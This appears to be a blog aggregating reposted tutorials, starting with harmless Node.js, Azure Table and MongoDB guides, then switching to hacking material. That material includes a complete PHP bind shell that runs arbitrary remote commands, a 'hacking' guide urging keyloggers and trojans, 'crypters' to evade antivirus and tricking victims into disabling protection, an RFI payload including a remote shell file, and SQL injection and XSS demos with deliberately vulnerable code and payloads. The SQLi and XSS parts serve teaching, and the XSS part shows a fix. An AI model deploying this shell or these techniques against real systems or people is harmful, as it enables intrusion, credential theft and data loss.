JSON round trip with Node.js

One of the first things you need to do, if you’re serious about writing a RIA with a JavaScript backend, is be able to quickly send messages to and from the server. JSON is obviously the best format for JavaScript-to-JavaScript communication. So, I set up a simple example of a node.js server that can both send and receive JSON objects via AJAX, and cache them in memory on the server. The full code of the example is out on github:

I’m going to pluck out the juicy bits right here, though, and explain them.

Client To Server

The first thing you need to do is be able to POST a JSON object. This is easy enough with jQuery:

function put(id, data, callback) {
 $.ajax('http://127.0.0.1:8181/' + id + '/', {
 type: 'POST',
 data: JSON.stringify(data),
 contentType: 'text/json',
 success: function() { if ( callback ) callback(true); },
 error : function() { if ( callback ) callback(false); }
 });
}

Note that the body of the POST is not URL encoded, like that of a POSTed form: that’s verbose and wasteful, and gets us nothing since we’d have to decode it on the server anyway. Note also that I’m using JSON.stringify. This is in the ECMA-262 standard, built into modern browsers, and Douglas Crockford has written a JSON compatibility library for legacy browsers.

The next step is to receive that message on the server. Inside of a HTTP response handler:

http.createServer(function(request, response) {
 ...
 if ( request.method === 'POST' ) {
 // the body of the POST is JSON payload.
 var data = '';
 request.addListener('data', function(chunk) { data += chunk; });
 request.addListener('end', function() {
 store[id] = JSON.parse(data);
 response.writeHead(200, {'content-type': 'text/plain' });
 response.end()
 });
 }
 ...
}

The request is emitting multiple “data” events, each with a piece of the JSON string: we have to accumulate all of these into one string. When all data is received, the “end” event is emitted, and we can proceed to parse the now-complete JSON string. In this case our handling consists only of tucking away the deserialized object in the store. Afterwards, we return a empty document with a “200 OK” status.

I should probably do error handling on the JSON.parse as it’s likely to throw an exception, but I forgot. Typical error handling looks like this:

try {
 store[id] = JSON.parse(data);
} catch ( e ) {
 response.writeHead(500, {'content-type': 'text/plain' });
 response.write('ERROR:' + e);
 response.end('\n');
}

Server To Client

This is very simple. On the server, we just have to get the object out of the store, serialize it, and write it out.

if ( request.method === 'GET' ) {
 // exact id lookup.
 if ( id in store ) {
 response.writeHead(200, {'content-type': 'text/json' });
 response.write( JSON.stringify(store[id]) );
 response.end('\n');
 } else {
 response.writeHead(404, {'content-type': 'text/plain' });
 response.write('no data for ' + id);
 response.end('\n');
 }
}

Note that I’m using the mime type text/json. The official MIME type is application/json, but I’ve had trouble with frameworks treating that as unencoded binary data. You should probably use the standard, though, unless you have a good reason.

jQuery supports JSON data right out of the box, so there’s barely anything for us to do on the client:

function get(id, callback) {
 $.ajax('http://127.0.0.1:8181/' + id + '/', {
 type: 'GET',
 dataType: 'json',
 success: function(data) { if ( callback ) callback(data); },
 error : function() { if ( callback ) callback(null); }
 });
}

Conclusion

It’s easy to send JSON from the client to the server, and even easier to get it from the server to the client. There are no no mismatched data types, no parsing or serialization algorithms, just two environments that speak the same language communicating in a minimal (but not trivial) subset of that language. Can you see why I’m so excited about this stuff?

Reference : http://oranlooney.com/json-round-trip/

Advertisements

How to Use the Table Storage Service from Node.js

This guide shows you how to perform common scenarios using the Windows Azure Table storage service. The samples are written written using the Node.js API. The scenarios covered include creating and deleting a table, inserting and querying entities in a table. For more information on tables, see the Next Steps section.

Table of Contents

What is the Table Service?
Concepts
Create a Windows Azure Storage Account
Create a Node.js Application
Configure your Application to Access Storage
Setup a Windows Azure Storage Connection
How To: Create a Table
How To: Add an Entity to a Table
How To: Update an Entity
How to: Change a Group of Entities
How to: Query for an Entity
How to: Query a Set of Entities
How To: Query a Subset of Entity Properties
How To: Delete an Entity
How To: Delete a Table
Next Steps

What is the Table Service?

The Windows Azure Table storage service stores large amounts of structured data. The service accepts authenticated calls from inside and outside the Windows Azure cloud. Windows Azure tables are ideal for storing structured, non-relational data. Common uses of Table services include:

  • Storing a huge amount of structured data (many TB) that is automatically scaled to meet throughput demands
  • Storing datasets that don’t require complex joins, foreign keys, or stored procedures and can be denormalized for fast access
  • Quickly querying data such as user profiles using a clustered index

You can use the Table service to store and query huge sets of structured, non-relational data, and your tables scale when volume increases.

Concepts

The Table service contains the following components:

Table1

  • URL format: Code addresses tables in an account using this address format:
    http://<storage account>.table.core.windows.net/<table>

    You can address Azure tables directly using this address with the OData protocol. For more information, see OData.org

  • Storage Account: All access to Windows Azure Storage is done through a storage account. The total size of blob, table, and queue contents in a storage account cannot exceed 100TB.
  • Table: A table is an unlimited collection of entities. Tables don’t enforce a schema on entities, which means a single table can contain entities that have different sets of properties. An account can contain many tables.
  • Entity: An entity is a set of properties, similar to a database row. An entity can be up to 1MB in size.
  • Properties: A property is a name-value pair. Each entity can include up to 252 properties to store data. Each entity also has three system properties that specify a partition key, a row key, and a timestamp. Entities with the same partition key can be queried more quickly, and inserted/updated in atomic operations. An entity’s row key is its unique identifier within a partition.

Continue reading

Node.js + MongoDB = Love: Guest Post from MongoLab


Node.js with the popular document-oriented MongoDB make for a deeply powerful and robust application platform. Or in other words, they rock.

(Note: This blog post was contributed by Ben Wen of MongoLab – a Joyent Partner and provider of MongoDB hosting, support and analytics)

Pair Joyent Cloud’s hosted node.js SmartMachine Appliance with MongoLab’s hosted MongoDB and the integration becomes downright operatic. Angels sing. Trumpets blare. Grey storm thunderheads of object-relational-mapping haze part. Revealed are golden rays of low-impedance JSON object storage and query. All in the fertile green valley of asynchronous JavaScript on the unflappable, cool bedrock of Joyent’s SmartMachine hosting platform. Songbirds tweet. Life is good. Metaphors strain.

More prosaically, the high performance asynchronous design of node.js and the tunable latency/consistency of MongoDB mean a high throughput application can be assembled in a compressed timeframe and with standard tools you probably have laying around the home. Since MongoLab runs managed hosted MongoDB instances on Joyent’s Cloud near a node.js SmartMachine, you get world-class operation of both environments.

Below, we’ll take a quick spin setting up a MongoLab database and a no.de account. We’ll build a minimalistic Web Server that can do some data inserts and queries and display it through a gratuitous 3D guestbook demo.

For the impatient

  1. Sign up at mongolab.com and create a MongoLab database on Joyent Cloud and note database name,hostname, port, database username/password
  2. Sign up at no.de and start a SmartMachine
  3. git clone git://github.com/mongolab/demo-node-01.git
  4. Modify config.js with database credentials and connection info from Step 1.
  5. git commit -a -m "updated config"
    git remote add mongolabdemo <your no.de machine>.no.de
    git push mongolabdemo master
  6. Point your WebGL capable browser to <your no.de machine>.no.de and enjoy.

For the really impatient

  1. Go to nodejs.mongolab.com with your WebGL compatible browser

What is MongoDB?

First a quick word about MongoDB for the newly initiated. MongoDB is a non-relational database system that emphasizes horizontal scale across multiple servers, tunable consistency, and high performance. Being a document-database, it uses JSON notation to describe data and sports a rich query language with indexes to enhance query speed. It also has a map-reduce framework for more intense data analysis and transformation. There is growing adoption of MongoDB for large stores of documents like in a Content Management System or in data analytics, for feature-rich Web 2.0 sites and games, and for persistent stores for mobile applications. Its code is open source licensed under the Gnu AGPL v3.0 and is commercially licensed from its author, 10Gen. Large corporations and smaller outfits are using MongoDB in production today. New users, you are in good company.

Continue reading

Bind Shell in PHP – With Authentication Feature

Bind Shell as the name suggests is a piece of code , which is used to host a shell on a server or a victim machine ! Its basically used to control the host machine remotely!

In this tutorial we’ll be making a Bind Shell in PHP with a authentication feature for extra protection.

The Code

Code: php
<?php

/*********************

@@author : lionaneesh
@@facebook : facebook.com/lionaneesh
@@Email : lionaneesh@gmail.com

********************/

?>

<html>
<head>
<title>Bind Shell — PHP</title>
</head>

<body>

<h1>Welcome to Bind Shell Control Panel </h1>

<p> Fill in the form Below to Start the Bind Shell Service </p>

<?php
if( isset($_GET[‘port’]) &&
isset($_GET[‘passwd’]) &&
$_GET[‘port’] != “” &&
$_GET[‘passwd’] != “”
)
{
$address = ‘127.0.0.1’; // As its a bind shell it will always host on the local machine

// Set the ip and port we will listen on

$port = $_GET[‘port’];
$pass = $_GET[‘passwd’];
// Set time limit to indefinite execution
set_time_limit (0);

if(function_exists(“socket_create”))
{
// Create a TCP Stream socket
$sockfd = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);

// Bind the socket to an address/port

if(socket_bind($sockfd, $address, $port) == FALSE)
{
echo “Cant Bind to the specified port and address!”;
}
// Start listening for connections
socket_listen($sockfd,15);

$passwordPrompt =
“\n=================================================================\n
PHP Bind Shell\n
\n
@@author : lionaneesh\n
@@facebook : facebook.com/lionaneesh\n
@@Email : lionaneesh@gmail.com\n
\n
=================================================================\n\n

Please Enter Password : “;

/* Accept incoming requests and handle them as child processes */
$client = socket_accept($sockfd);

socket_write($client , $passwordPrompt);

// Read the pass from the client

$input = socket_read($client, strlen($pass) + 2); // +2 for \r\n
if(trim($input) == $pass)
{
socket_write($client , “\n\n”);
socket_write($client , shell_exec(“date /t & time /t”)  . “\n” . shell_exec(“ver”) . shell_exec(“date”) . “\n” . shell_exec(“uname -a”));
socket_write($client , “\n\n”);
while(1)
{
// Print Command prompt
$commandPrompt =”(Bind-Shell)[$]> “;
$maxCmdLen = 31337;
socket_write($client,$commandPrompt);
$cmd = socket_read($client,$maxCmdLen);
if($cmd == FALSE)
{
echo “The client Closed the conection!”;
break;
}
socket_write($client , shell_exec($cmd));
}
}
else
{
echo “Wrong Password!”;
socket_write($client, “Wrong Password , Please try again \n\n”);
}
socket_shutdown($client, 2);
socket_close($socket);
}
else
{
echo “Socket Conections not Allowed/Supported by the server! <br />”;
}
}
else
{
?>
<table align=”center” >
<form method=”GET”>
<td>
<table style=”border-spacing: 6px;”>
<tr>
<td>Port</td>
<td>
<input style=”width: 200px;” name=”port” value=”31337″ />
</td>
</tr>
<tr>
<td>Passwd </td>
<td><input style=”width: 100px;” name=”passwd” size=’5′ value=”lionaneesh”/>
</tr>
<tr>
<td>
<input style=”width: 90px;” class=”own” type=”submit” value=”Bind :D!”/>
</td>
</tr>

</table>
</td>
</form>
</tr>
</table>
<p align=”center” style=”color: red;” >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
<?php
}
?>

 

Using

The Bind Shell is implemented to be simple to understand and easy to use! The Introduction page is quite self explanatory and will tell you everything you need to know!

Here is a Screen Shot of its working :-

Enjoy !!!

Reference : http://www.go4expert.com/forums/showthread.php?t=26855

Complete HACKING information

Introduction:

We see a millions of people going to different forums and websites and asking “how do i hack an email?”, “Can you hack blah for me?”. So thought to create a tutorial which will give you the basic idea about what the heck is a “HACK”, and how to DEFEND YOUR SELF AGAINST HACKERS.

Disclaimer:

As i have seen controversies in the past, here is the disclaimer.

I or the staff of Go4expert.com’s does not take any responsibility if you use this tutorial in unethical way. This is written to help you to beware of whats going around, and save your self by not being hacked!

Background:

Hacking started way too far when the windowsd 98 was designed. Hacking is basically finding out the loop holes and trying leak some information out of it, which may lead you to get some critical information like passwords, credit card details. Sometimes hacking is done just because of the personal offesnses.

Things to remember

I will suggest you, KEEP READING ARTICLES AND TUTORIALS FROM GOOD SITES. THATS THE ONLY WAY YOU CAN LEARN.

Initialization:

Getting back to the main point, I am going to discuss some of the ways of hacking in brief. Hacking is basically bifurcated in 2 major parts.

1. Email or the user information
2. Web based hacking.

Email or user information:

These days the most commonly used and famous way of hacking user information like Emails, Passwords, Credit card details are as follow:

a. Phishing
b. Brute Forcing
c. Keylogging
d. Trojans

a. Phishing:

Phishing is basically a massive attack. What a hacker does is, they created an absoulutely look alike page of some website like yahoo or gmail. They upload it to their own server. And give the link to any n00b user. When they open it, they think that they are on the yahoo or gmail page, they put in their username and password, click on submit and WHOA! your information has been submitted. This is widely used by new people trying to entering into ahcking world.
Most recent example in india was some scam with ICICI bank, lots of user info was stolen as far as i remember. I read it somewhere in the news paper and was thinking what the hell! ?

Disadvantages: Still many people give it a try before going for phishing, because the only problem in phishing is, even if the victim knows a little about internet, he will read the URL and understand that it is not a genuine website.

b. Brute Forcing

Brute forcer is basically a program which could be called as a “cracker”. In brute focer you put the username you want to hack, and as a password you put a notepad file which has almost all of the existing english words in it. So what it does is, it will try each and every word from that file and see if anything matches. You might have noticed some topics like “huge pass list” on different forums, they are nothing but the password list to put into your bruteforcer.!

Disadvantages:
1. Sometimes brute forcing may just go for ages!
2. It isnt guaranteed
3. These days many people have alpha-numeric-symbol password which is real tough for brutefocer to detect
4. Most of the famous sites like yahoo, gmail are designed in such a way that it will put the “image captcha” after 3 incorrect login attempts, which stops the bruteforcer.

P.S:- I have made some focused FTP, Gmail & Yahoo bruteforcers which are avilable on my website.

c. Keylogging

Keylogger helps you to create a little filed which is known as “server”. You gotta send your server to the victim. he has to click on it and then YOUR DONE! this is what happens.
Best possible way to hack someone. Keyloggers are basically a program which will install themselves in your victim’s computer and will keep on recording each and every keystroke pressed by the victim on his keyboard and it will send it to the hacker. There are many ways to receive the keystroke i.e. FTP, Email, Messengers. According to me this is the best way to trick your victim and get their information 

Disadvantages :
1. When victim receives the keylogger, in most of the cases, their anti virus would auto delete them. So you have to convince them to desable the anti virus by bluffing something.
2. Sometimes firewall blocks the keylogs from being sent.

Tips :
1. There are some programs which are known as “crypters” which will help you to make your server’s undetectable. So your victim’s anti-virus would not be able to detect them.

d. Trojans:

Trojans are like father of keyloggers. Trojan sends you the keylogs just as keyloggers, on top of that, it lets you take the control of victim’s computer. Edit / delete/ upload / download files from or to their computer. Some more funny features like it will make their keyboard go mad, it may kep on ejecting and re-inserting the cd ROM. Much more..

Disadvantages :
Same as keyloggers.

Tips :
Same as keylogger.

Web Hacking:

I will discuss some most commonly used web hacking techniques which helps hackers to hack any website. This will help you to SAVE YOUR SITE!

1. SQL Injection
2. XSS
3. Shells
4. RFI
5. There are some more but they are TOOO big to be discussed in here.

1. SQL Injection:

Most of the websites these days are connected to an SQL Database. Which helps them to store usernames and passwords [encrypted] when a guest registers to their website. SQL database processes a querie everytime a user logs in. It goes to the database, validates the password, if its correct then it logs in the user and if its not then it gives an error.
So the basic funda is executing a command to parase a query in the database to try to exploit the internet information of the database. I cant really put the entire tutorial about because this is the most complicated way to hack the website! 

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site’s URL is:

Code:
 yoursite.com/index.php?id=545

just add a ‘ like this at the end

Code:
 yoursite.com/index.php?id=545'

2. XSS:

XSS is another nice way to ahck some website. Suppose if some website/ forum is allowing HTML in the psot or articles, then a hacker can post a malicious script into the content. So whenever a user opens up the page, the cookies would be sent to the hacker. So he can login as that user and f*ck the website up.

3. Shells:

Shell is a malicious .php script. What you have to do is, find a palce in any website where you can upload any file like avatars, recepie, your tricks, your feedbacks. And you try to upload your shell files from there. And if its uploaded then WHOA!you open it from the URL bar and u can see the entire “FTP” account of that webhosting. YOu can rename/edit / upload/download anything u want including the index page.
This is also known as deface.

4. RFI:

RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:

Code:
 yoursite.com/shell.txt

and you found a vulnerable site to RFI… then you can do as follow:

Code:
 victimssite.com/index.php?page=yousite.com/shell.txt

This will again give u the access of your victim’s sites FTP , just as shell so you can f*ck up anything you want.

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site’s URL is:

Code:
 yoursite.com/index.php?id=545

just add something liek this at the end

Code:
 yoursite.com/index.php?id=http://www.google.com

And if it incldes the google page into your page, that means its vulnerable to RFI.

Reference : http://www.go4expert.com/forums/showthread.php?t=16514

Understanding Basic SQL Injection

SQL injection (also known as SQLI) is a code injection technique that occurs if the user-defined input data is not correctly filtered or sanitized of the ‘string literal escape characters’ embedded in SQL.

Basically SQLI is a way of injecting and executing arbitrary SQL statementsThe whole idea is to make the application execute our arbitrary code which was not intended. In this tutorial we’ll be looking on how a basic SQL code injection can cause the application to mess up its authentication login and which would eventually lead to data access. So what’s the waiting then let’s get started.

Authentication Bypass (SQL injection)

Most of the authentication scripts you’ll find on the web are not secured and despite this vulnerability first appeared in 1990’s  there are still many applications vulnerable to this attack.

How SQL injection works?

This attack simply exploits bad filtering or sanitizing mechanism in the database layer of an application, this vulnerability gives the room to attackers to basically alter arbitrary SQL code to be executed.

For example you have a basic SQL statement as follows:-

Code:
  SELECT * FROM Users where Name = ‘UserInput’;

Now if the page is vulnerable to this kind of attacks then an attacker have the room to alter anything to this SQL statement.
For Example the attacker can simple add

Code:
  ‘ or ‘1’ = ‘1

Which would result in :-

Code:
  SELECT * FROM Users where Name =  ‘’ or ‘1’ = ‘1’

Now if you know some basic SQL you can simply point out that this means that now the application will be forced to get all the users in the table as the statement now includes a or condition i.e ‘1’ = ‘1’ which in any case will always be true.

Demonstration

To demonstrate a basic SQL authentication bypass attack I have created a set of some php scripts.

defines.php

Code:
  <?php
  $tableName = "badlogin";
  $dbName               = "sqlnjection";
  $sqlServer = "localhost";
  $sqlUser = "root";
  $sqlPass = ""; 
  ?>

functions.php

Code:
  <?php
require "defines.php";

function checkTable()
{
	global $tableName;
	$query = "SELECT * from $tableName";
	$result = mysql_query($query) or die(mysql_error());
	if($result == FALSE) // Table is not created till
	createTable();
}
function createTable()
{
	global $tableName;
	$query = "CREATE TABLE $tableName(login char(50),pass char(50))";
	$result = mysql_query($query);
	$query = "INSERT INTO $tableName(login,pass) values('admin','UnCrACkAbLe')";
	$result = mysql_query($query);
}
function checkCredentials($login,$pass)
{
	global $tableName;
	$query = "SELECT * FROM $tableName WHERE login='$login' AND pass='$pass';";
	//            echo "<br/>$query<br/>";
	$result = mysql_query($query) or die(mysql_error());
	$rowsnum = mysql_num_rows($result);
	if($rowsnum > 0)
	{
		congrats();
	}
}
function congrats()
{
	echo"<p class='warning'>Congratulations You just completed the Challenge...</p>";
	echo"<script type='text/javascript'>alert('Mission Completed');</script>";
	// The redirection and Points award code should go here
}
?>

sqlInjection.php

Code:
<?php
require "defines.php";
require "functions.php";
?>
<html>
<head>
	<title>Bad Login</title>
	<link href='style.css' type='text/css' rel='stylesheet'/>
</head>
<body>
	<h1>Welcome to bad Login Please Enter your Credentals</h1>
	<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
	<table align="center">
		<tr>
			<td>Login</td>
			<td> : <input type="text" name="login"/></td>
		</tr>
		<tr>
			<td>Password</td>
			<td> : <input type="text" name="email"/></td>
		</tr>	
		<tr>
			<td><input type="submit" name="go"/></td>
		</tr>
	</table>
	</form>
<?php   
if( isset($_POST['login']) && isset($_POST['email']) &&	isset($_POST['go']) )
{
	mysql_connect("$sqlServer","$sqlUser","$sqlPass") or mysql_error();
	mysql_select_db("$dbName") or mysql_error();
	//checking if table exists
	checkTable(); // checks if the table exists and create new if not found
	checkCredentials($_POST['login'],$_POST['email']);
}
?>

</body>
</html>

Constructing the Attack String :-

Our main purpose for this scenario is to check is to exploit the vulnerability in the above set of pages and gain access to ‘admin’ account , We can simply do that by the following ways :-

  1. Giving “admin’#” as a username to the application , This means that after writing admin as a username we used ‘#’ to comment any other code after that.
  2. Giving “admin” as username and “ ‘ or ‘1’ = ‘1 “ as password. This would trick the application to use an ‘or always true’ condition which would eventually result in authentication bypass.

 

Reference : http://www.go4expert.com/forums/showthread.php?t=26236

Basics of XSS or Cross Site Scripting Explained

Cross Site Scripting also known as XSS is a popular type of Client Site Attack, It is a type of attack which occurs in Web-Applications and allows an attacker to inject desired client-side scripts into Web-Pages viewed by others.

Types of XSS
This attack is mainly of 2 types

Non-Persistent

This type of attack is carried out by injecting some client side code in a Vulnerable URL. Now further the Attacker can spread this URL and send it to his/her victims by means of some social engineering etc , on clicking these links the Victims Unknowingly executes the injected code , Which in turn can result in Cookie stealing , Privacy Disclosure etc.

Persistent

This type of Attack is more dangerous and it occurs when the data provided by the attacker is stored by the server, which is viewed as a normal page to the normal users.
Now Further the Attacker can simply inject some malicious Client Side Code which in turn can result in Defacement of the Website, Cookie Stealing, and Privacy Disclosure etc.

Demo

Now that we know something about what are these type of vulnerabilities and how they occur let’s actually take a look at how these vulnerabilities occur How to test it!
Xss.php

Code: php
<html>
<head>
<title>Vulnerable to XSS</title>
</head>
</html>
<body>
<h1>Welcome to XSS Demo Page</h1>

<p>The Data Entered is As Follows :- </p>

<?php

/**
* @author lionaneesh
* @copyright 2011
*/

if(isset($_GET[‘data’]))
{
$data = $_GET[‘data’];
}
else
{
$data = “No Data Entered !”;
}

echo “<i>$data</i>”;

?>

</body>

Now Just Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Wow! An Alert box saying XSS will appear proving that your injected code actually executed! Now this is just an example of how these vulnerabilities can occur in web-applications and how you can test them!

How to Fix Them

If you’re one of the people whose site is vulnerable to this type of attack I recommend fixing it as soon as possible, For the scope of this tutorial I’ll be only covering on how these vulnerabilities can be fixed in PHP , If you are using some other language , I recommend you to check your Language Reference or Contact Me .

PHP Provides a function called htmlspecialchars() which converts the chars into their HTML entities. Now we’ll just use this in the above code and check what happens.
Xss.php (line number 33)

Code: php
echo htmlspecialchars(“<i>$data</i>”);

Now let’s once more Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Voila! U can notice the change now!

Reference : http://www.go4expert.com/forums/showthread.php?t=26878